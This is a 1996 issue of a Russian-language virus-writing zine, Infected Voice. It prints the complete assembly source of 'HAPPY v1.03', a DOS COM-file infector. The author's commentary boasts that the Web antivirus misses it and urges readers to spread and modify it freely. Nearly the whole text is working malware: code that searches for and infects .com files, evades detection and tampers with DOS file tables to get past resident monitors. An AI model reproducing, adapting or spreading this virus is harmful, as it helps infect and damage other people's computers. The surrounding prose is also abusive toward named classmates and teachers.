;
;      ▄▄                  █
;     ▀▀▀  Virus Magazine  █ Box 10, Kiev 148, Ukraine       IV   1996
;     ▀██ ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ █ ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀▀▀▀▐▀▀▀  █▀▀▀▀▀▀▀█
;      ▐█ █▀▄ █▀▀ ▄▀▀ ▄▀▀ ▄█▄ ▄▀▀ █▀█    ▌ █ ▄▀█ █ ▄▀▀ █▄▄   █ █ █▀█ █
;       █ █ █ █▀  █▀  █    █  █▀  █ █    █ █ █ █ █ █   █     █ █ █ █ █
;       █ ▐ ▐ ▐   ▐▄▄ ▐▄▄  ▐  ▐▄▄ ▐▄▀     ▀█ ▀▄█ ▐ ▐▄▄ ▐▄▄▄  █ █ █▄█ █
;       ▐ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄  █▄▄▄▄▄▄▄█
;          (C) Copyright, 1994-96, by STEALTH group WorldWide, unLtd.
;
;======================================================================
;         ОТ вРЕДАКЦИИ:
;
;         Вирус сей был получен GroundScriber'ом в КПИ от независимого
; вирмейкера PROFESSOR'а.
;         Исходник компилится в EXE файл.
;         Как показала проверка последним вышедшим на данный момент
; wEb'Ом v3.15 в шизоидном режиме, ни один зараженный файл не wебется.
;         Успехов тебе в вирмейкинге, PROFESSOR! Приглашаем к
; сотрудничеству!
;======================================================================
;
;____________________Лирическое отступление/вступление______________________
;                                              Жирному Б.
;                                              Ебнутому П.Б.
;                                              Злостным юзерам А.С. и П.Я.
;                                              Хитрому К.
;                                              Глупому Г.
;                                              Моим до смеху любимым преподам
;                                              А.З.И.,П.В.А.,Б.Л.Н.
;                                              и им подобным посвящается
;
;Hi , my  'dear' (still alive & trembling at the heaps of soft,shit,boots,...)
;                       USERS and LAMERS !
;Как вы  (последние) мне ОСТОЕ..НЕЛИ с вашими бесконечными наглыми приколами:
;               "Дай лабу,расчетку,реферат,и т.д. и т.п."
;В последнее время многие из вас разжирели,ужрались,о..ели.Многие обзавелись
;Pentium'ами,486,АОНами. Не без моей помощи,конечно. Почти все вы любите что-
;-либо просить,а вот выполнять чьи-то просьбы - не очень. Но в этом уже нет
;ничего страшного,ничего страшного господа. Вы лишь осознаете разницу между
;write и writeln - единственное чему научили в ВУЗЕ вас вам же подобные
;преподы.Они еще вас научат разнице между IN и OUT.Вы же будете рвать жопу,
;что знаете ASM (PASCAL вы тоже знаете),только свои работы делать будете не
;вы,а сосед по комнате в общаге,друг (у вас еще есть друзья !),одним словом
;только не вы.Хотя вы и являетесь юзерами больше двух лет, однако все еще
;сильно любите геймы.Я начинал свою 'карьеру' куда позже вас и тоже с нуля
;(еще и продолжу!),а вас до сих пор прет от WOLFSTEIN`a,WINDOWS,окошек,
;обьектов и прочей хуйни от BORLAND, MICROSOFT, SYMANTEC,PARALLAX SOFTWARE
;и т.д. .... Это только начало...
;А вообще же хер с вами, DOOMайте дальше господа,хотя DOOMать то дальше
;некуда, CD-ROM дымиться начнет.
;               До встречи на ваших дисках!
;                                               PROFESSOR
;__________________________________________________________________________
;
;      Здравствуйте уважаемые господа читатели и почитатели INFECTED VOICE !
;Вашему вниманию предлагается COM нерезидентный вирус.Прошу строго не судить,
;т.к. это моя первая более менее длинная программа на ASMe.To be continued
;это уж точно. Вирь заражает файлы в текущем каталоге,подписываясь в их конец
;и не содержит никакой деструкции.(трассируйте и запускайте на здоровье)
;Отличие от других - в оригинальной стартовой
;части,что делает вирус неWEBущимся на файлах больше 2 кило.
;По-моему еще и в том что инсталлятор=главное тело начинается со смещения
;100H. WEB же тупо разбивает файл на параграфы и начинает параграф:0000
;ХЕРИСТИЧЕСКИЙ ( я не ругаюсь,а транскрипирую с английского ) анализ
;       mov ax,cs
;       add start_cs,ax
;       mov byte ptr cs:[251d],9ah
;       mov word ptr cs:[252d],0100h
;       mov ax,start_cs
;       mov word ptr cs:[254d],ax
;       mov ax,251d
;       jmp ax
;start_cs dw (?)
;Вирь ставит длинный CALL в область PSP ,т.е. по RETF автоматически получает
;управление программа.Данная стартовая часть представлена в виде строки ASCII
;в start_header.Зараженные файлы имеют время создания HH:MM:32.
;P.S. В настоящее время автор работает над RC CRYPT вирусом.

@stack segment STACK
dw 200 dup ((?))
@stack ends

installer segment 'code'
assume cs:installer,ds:installer,es:installer,ss:@stack
start1:
        call main
        mov ah,4ch
        int 21h
installer ends

@virus segment para 'code'
assume cs:@virus
main proc far
DB 256 dup ((?))
start:  push ds
        push es
        mov bp,sp
;не впервые ли мы стартуем ?
this1:  push cs
        pop ds
        cmp real_cs,0000h
        je install              ;впервые ...
;||||перенесение куска жертвы в начало т.е. того,что было там до нас||||
        cld
        mov si,offset buffer1
        mov di,00FBh
        mov cx,38d
        rep movsb
;|||||||||||||||||||||подготовка к заражению||||||||||||||||||||||||
;Fuck OFF (not ONN) the DEBUGGER (жалкий пример использования конвейера)
        push cs
        pop ds
        mov bx,offset go_to_next
        mov ax,offset exit_point
        mov word ptr ds:[bx],0E0FFh
go_to_next:
        jmp install
;__________________установим ДОП на наш сегмент____________________________
install:
        push cs
        pop ds
        call set_INT24_to
        push cs
        pop es
        lea dx,end_of_vir
        mov ah,1ah
        int 21h
;_____________________вызовем 'FindFirst'__________________________________
        mov ah,4eh
        mov cx,0000000000000110b
        mov dx,offset shablon
        int 21h
        jc exit_to_file
next:   call infect_me                  ;вызовем процедуру заражения
;_____________________вызовем 'FindNext'___________________________________
        mov ah,4fh
        int 21h
        jnc next                        ;есть ли еще  *.comЫ ?
;|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
exit_to_file:
        call set_INT24_back             ;
exit_point:
        mov sp,bp                       ;нет КОНЬчились
        pop es                          ;
        pop ds                          ;
        retf                            ;к жертве



;--------------------------------------------------------------------------
;++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
;--------------------------------------------------------------------------
infect_me proc near                     ;процедура ВИРификации
        push es
        mov sp_pnt,sp
        lea bx,end_of_vir               ;в ВХ смещение ДОП
;проверим размер жертвы
        mov ax,word ptr [bx+1ah]        ;длина файла из ДОП
        cmp ax,2500d                    ;длина жертвы < 2500 байт ?
        jb exit1                        ;да,значит не подходит
        cmp ax,64500d                   ;длина жертвы > 64500 байт ?
        ja exit1                        ;да,значит не подойдет
;не COMMAND.COM нам попался ?
        mov cx,0004h
        mov di,offset command
        lea si,end_of_vir
        add si,1eh
        repe cmpsw
        je exit1                        ;ага,ОН
;проверка на зараженность
inf:    mov ax,[bx+16h] ;не инфицирован ли ?
        xor dx,dx
        mov cx,2048d
        div cx
        mov f_hours,ax
        mov ax,dx
        mov cx,32d
        xor dx,dx
        div cx
        mov f_minutes,ax
        cmp dx,0010h
        je exit1                        ;да,инфицирован
;выравниваем вирь на границу параграфа

long:
        mov ax,[bx+1ah]
        xor dx,dx
        mov cx,0010h
        div cx
        cmp dx,0000h                    ;без остатка ли ?
        je para_ok                      ;да,без
        inc ax
para_ok:
        mov real_cs,ax                  ;cохраним
open_file:
;откроем файл
        mov dx,bx
        add dx,1eh
        mov ax,3d00h
        int 21h
        jnc go_dali
exit1:  jmp exit                        ;увы,не подходит
go_dali:
        mov bx,ax
;no comments [ especially for vSAFE,-dddd3,and other T-S-R shit ]
        push bx
        mov ax,1220h
        int 2fh
        mov bl,byte ptr es:[di]
        mov ax,1216h
        int 2fh
        pop bx
        call set_pointer

;прочтем первые 33 байта в начале файла
        mov dx,offset buffer
        mov cx,33d
        mov ax,3f00h
        int 21h
        jc error

;случайно это не .ЕХЕ обозванный .СОМом ?
        xchg bx,dx
        cmp [bx],5A4Dh
        xchg dx,bx
        je error                                ;точно он
        call set_pointer

;запишем в начало файла стартовую часть вируса
        mov byte ptr es:[di+02h],02h          ;изменим режим доступа в SFT
        mov ah,40h
        mov dx,offset start_header
        mov cx,33d
        int 21h
        jc error

;установка указателя для записи тела вируса
        mov ax,0010h
        mul real_cs
        mov word ptr es:[di+15h],ax
        mov word ptr es:[di+17h],0

;запись тела
        mov ah,40h
        lea cx,vir_length
        mov dx,offset start
        int 21h
        jc error

;установим время создания файла
        push bx
        mov ax,f_hours
        mov bx,2048d
        xor dx,dx
        mul bx
        add ax,10h
        mov cx,f_minutes
        xchg ax,cx
        mov bx,32d
        mul bx
        add cx,ax
        lea bx,end_of_vir
        mov dx,[bx+18h]
        mov ax,5701h
        pop bx
        int 21h
        jc error

error:  mov ah,3eh
        int 21h

exit:   mov sp,sp_pnt
        pop es
        ret
infect_me endp
;--------------------------------------------------------------------------
;++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
;--------------------------------------------------------------------------
;__________________________________________________________________________
;++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
;--------------------------------------------------------------------------
;устанока обработчика INT 24H для предотвращения  Abort'ов ДОСу
set_INT24_to proc near
        mov ax,3524h
        int 21h
        mov vec_seg,es
        mov vec_off,bx
        mov ax,2524h
        mov dx,offset INT24_handler
        int 21h
        ret
set_INT24_to endp
;__________________________________________________________________________
;++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
;--------------------------------------------------------------------------
;поставим INT24h обратно
set_INT24_back proc near
        mov ax,2524h
        mov dx,vec_off
        push ds
        mov ds,vec_seg
        int 21h
        pop ds
        ret
set_INT24_back endp
;--------------------------------------------------------------------------
;++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
;--------------------------------------------------------------------------
;установим указатель файла в его начало
set_pointer proc near
        mov word ptr es:[di+15h],0
        mov word ptr es:[di+17h],0
        ret
set_pointer endp
;--------------------------------------------------------------------------
;++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
;--------------------------------------------------------------------------
INT24_handler:                          ;обработчик INT24h
        mov al,03h
        iret
;--------------------------------------------------------------------------
;++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
;--------------------------------------------------------------------------

;разные данные
start_header db 'М╚.╞√ Ъ.╟№  б.г■ ╕√  р'
real_cs dw (?)
buffer1 db 5 dup ((?))
buffer db 33 dup ((?))
shablon db '*.com',0
command db 'COMMAND.'
for_him db 'HAPPY v1.03 (C) PROFESSOR,KPI'
vir_length equ $-100h
vec_off dw (?)
vec_seg dw (?)
sp_pnt dw (?)
f_hours dw (?)
f_minutes dw (?)
end_of_vir equ $
db 200 dup ((?))
main endp
@virus ends

end start1

;================================ЭТО ВСЕ====================================
;                               HAPPY v1.03     (C) 1996 PROFESSOR
;                                                      independent virmaker!
;ОТ АВТОРА:
;Прошу всерьез не принимать этот извращенческий (особенно из-за 10-ной 
;системы счисления) текст на АСМе.Вирь писался с перерывами в пол-месяца,
;когда мне выделяли видеокарту на 1/4 суток.
;Без особого желания,как и труда общее количество команд и обьем вири можно
;значительно уменьшить.По возможности сделаю и это немного погодя.Пока же
;с прескорбием сообщаю,что МУДАКОВ на нашем факультете куда больше,чем я
;предполагал.Посему свободного времени для написания вирей остается очень 
;мало (Экзамены люблю сдавать со средним баллом "5.0")
; С уважением PROFESSOR
НЕМНОГО ПОГОДЯ: НЕ ГАРАНТИРУЮ,ЧТО WEB НЕ ЛЯПНЕТ 'COM-Virus' НА ЗАРАЖЕННЫЕ ФАЙ
ЛЫ ПРИ ОПРЕДЕЛЕННОМ СООТНОШЕНИИ ДЛИНЫ ВИРЯ И ЖЕРТВЫ.ОЧЕВИДНО,ЧТО ДАНИЛОВ ТУПО
'ИСПОЛНЯЕТ' ФАЙЛ ЧЕРЕЗ 10Н БАЙТ.БУДУ БЛАГОДАРЕН ЗА ЗАМЕЧАНИЯ И ПОЖЕЛАНИЯ К
ТЕКСТУ ПРОГРАММЫ.ВИРЬ МОЖНО СВОБОДНО РАСПРОСТРАНЯТЬ,UPGRADИТЬ,ВСТАВЛЯТЬ КОПИ-
РАЙТЫ (Я УЖЕ ПРИВЫК),ОДНАКО СОХРАНИВ!!! ИСХОДНОЕ НАЗВАНИЕ 'HAPPY v1.??'.